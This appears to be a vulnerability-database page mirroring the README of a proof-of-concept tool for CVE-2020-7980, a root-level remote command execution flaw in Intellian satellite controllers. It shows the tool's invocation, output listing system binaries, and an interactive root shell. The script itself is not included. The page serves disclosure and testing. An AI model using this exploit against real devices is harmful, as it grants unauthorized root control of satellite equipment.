关联漏洞
描述
PoC script that shows RCE vulnerability over Intellian Satellite controller
介绍
# Satellian-CVE-2020-7980
Satellian is a PoC script that shows RCE vulnerability over Intellian Satellite controller (Intellian Aptus Web).
The following script will try to list all the binaries in the system and afterwards will allow the tester to interact directly with the server (usually as root).
# PoC
```
xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
________________________________________
(__) / \
(oo) ( Intellian Satellite Terminal PoC )
/-------\/ --' \________________________________________/
/ | ||
* ||----||
Performing initial scan. Listing available system binaries.
Starting request to http://<redacted>
Executing command /bin/ls /bin
acu_server
acu_tool
addgroup
adduser
...
Satellian $ id
uid=0(root) gid=0(root)
```
# Tested versions
Intellian v1.12, v1.21, v1.24.
# Disclaimer
All the information in this repository is for educational purposes only. The author of the repository is in no way responsible for any misuse of the information. This script is just a proof of concept, and has not been in no way developed for malicious activities.
文件快照
[4.0K] /data/pocs/9d00b67cbb1aea893a960b8f1db3a07fd4777fe7
├── [1.2K] README.md
└── [2.7K] satellian.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。